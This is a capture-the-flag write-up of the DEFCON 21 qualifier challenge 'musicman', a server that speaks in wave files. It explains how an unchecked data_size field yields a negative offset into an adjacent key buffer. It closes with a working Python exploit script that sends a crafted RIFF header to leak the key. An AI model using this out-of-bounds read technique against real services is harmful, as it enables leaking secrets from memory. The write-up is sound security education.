Update: Here's the binary musicman.
I spent last week end solving some challenges in the DEFCON 21 CTF (qualification round). Among them, I like the third reverse engineering challenge, musicman, the most.
Musicman is kind of innovative. High level speaking, musicman is an echo server with a twist. It modulates bytes to frequencies thus transforms text strings to wave files. The goal of this challenge is to read the content of the file /home/musicman/key by communicating with the server over wave data. We do not send regular text commands anymore. We need to send wave files.
On start up, the server reads the content of the key file, transforms that into a wave file, and stores that to a global variable key.
Then it starts listening for new connection. When a connection arrives, the server sends a wave file that is the modulated form of the greeting string down to the client. Then the server goes into an infinite loop receiving wave file from client, and sending similar wave file back to client.
Each wave file uploaded by the client is converted into text string by the server. After that, the server prepends a string "You said: " to the converted text string. It then transforms this string into a wave file, and sends the wave file to the client.
All wave data (the received wave file, the modulated wave file) in this phase are stored in a global buffer named wav. The wave file that the client uploads goes to that buffer. The resulting wave file of text modulation goes to that buffer.
key and wav are adjacent to each other in the address space. key is at a lower address than wav. Both key and wav are 1.000.000-byte long.
So, basically, we need to understand the format of a wave file in order to talk to the server. With a little bit of research, this is the structure I found.
FOURCC riff_id; // 'RIFF' DWORD riff_size; // remaining size of the file // not including riff_id, and riff_size FOURCC wave_id; // 'WAVE' FOURCC fmt_id; // 'fmt' DWORD fmt_size; // must be 0x10, the size of the // WAVEFORMAT struct WORD wave_type; // must be 1, for PCM WORD nr_channs; // number of channels DWORD sample_rt; // samples per second DWORD byte_rt; // bytes per second WORD block_alg; // block align WORD bits; // bits per sample FOURCC data_id; // 'data' DWORD data_size; // size of remaining data after this char begin_data;
There are three size fields in this struct. The first one, riff_size, is the total data of the rest of the file. The second one, fmt_size, describes the size of the struct that follows it. If this is 16 byte long, it is WAVEFORMAT struct. It could also be WAVEFORMATEX, but we're not worrying about that here. The third field, data_size, is the size of remaining data.
The server does have pretty thorough checks on the received wave data. It makes sure that riff_id is RIFF, wave_id is WAVE and so on. More importantly, it makes sure that riff_size is appropriate for the 1.000.000-byte long buffer.
After passing all these sanity checks, the server starts demodulating wave data to string. But instead of getting to begin_data by a fixed offset value relative to the beginning of the file (riff_id), the server dynamically calculates that offset value by
riff_size - data_size + 8.
There lies the problem. Unlike other fields, data_size is not checked. So if data_size is greater than riff_size, the offset value will be negative; we will point backwards.
Remember that all the wave data are stored in wav buffer, and key buffer is before wav. Hence, pointing backwards will mean that we'll be accessing key data. And that is how we're going to extract key.
The idea of exploitation is to send the server a fake wave file whose header's data_size is appropriately set so that the server will demodulate its own global key buffer. Then the server will prepend "You said: " to the resulting text string (which would be the content of the key file), modulate it to a wave file, and send that wave file to us.
But we've only got the wave file. We know that the wave file is the representation of the string You said: <key value>. We need to demodulate it. And that's easy because we can run a local copy of the server; we make it work for us. So we will set a breakpoint right after it has demodulated client's wave file (after RecvString function). Then we send our local server the received wave file that we've obtained from the actual server. When the breakpoint hits, we get the string.
Here's the script that talks to the original server, grabs its key wave data, and bounces that data to a local server on localhost.
from socket import * import struct HOST = 'musicman.shallweplayaga.me' PORT = 7890 def read_n(s, l): r = '' while True: d = s.recv(l - len(r)) if d == '': break r += d if len(r) >= l: break return r s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) data = read_n(s, 8) header, data_len = struct.unpack('<4sI', data) assert(header == 'RIFF') remaining_len = data_len read_n(s, remaining_len) print 'Received first message', data_len # now send some long wave data over there riff_length = data_len + 100000 data = 'RIFF' + struct.pack('<I', riff_length - 8) data += 'WAVEfmt ' + struct.pack('<I', 0x10) data += struct.pack('<HHIIHH', 1, 1, 44100, 44100*2, 0, 16) data += 'data' data_length = riff_length - (len(data) + 4) data += struct.pack('<I', data_length + 1000000 & 0xFFFFFFFF) data += 'a' * data_length s.send(data) print 'Sent our fake wave' data = read_n(s, 8) header, data_len = struct.unpack('<4sI', data) data += read_n(s, data_len) f = open('key.wav', 'w') f.write(data) f.close() print 'Saved key.wav' # connect to our own daemon, remember to run it in GDB to extract the key s = socket(AF_INET, SOCK_STREAM) s.connect(('localhost', 7890)) junk = read_n(s, 8) header, data_len = struct.unpack('<4sI', junk) read_n(s, data_len) s.send(data)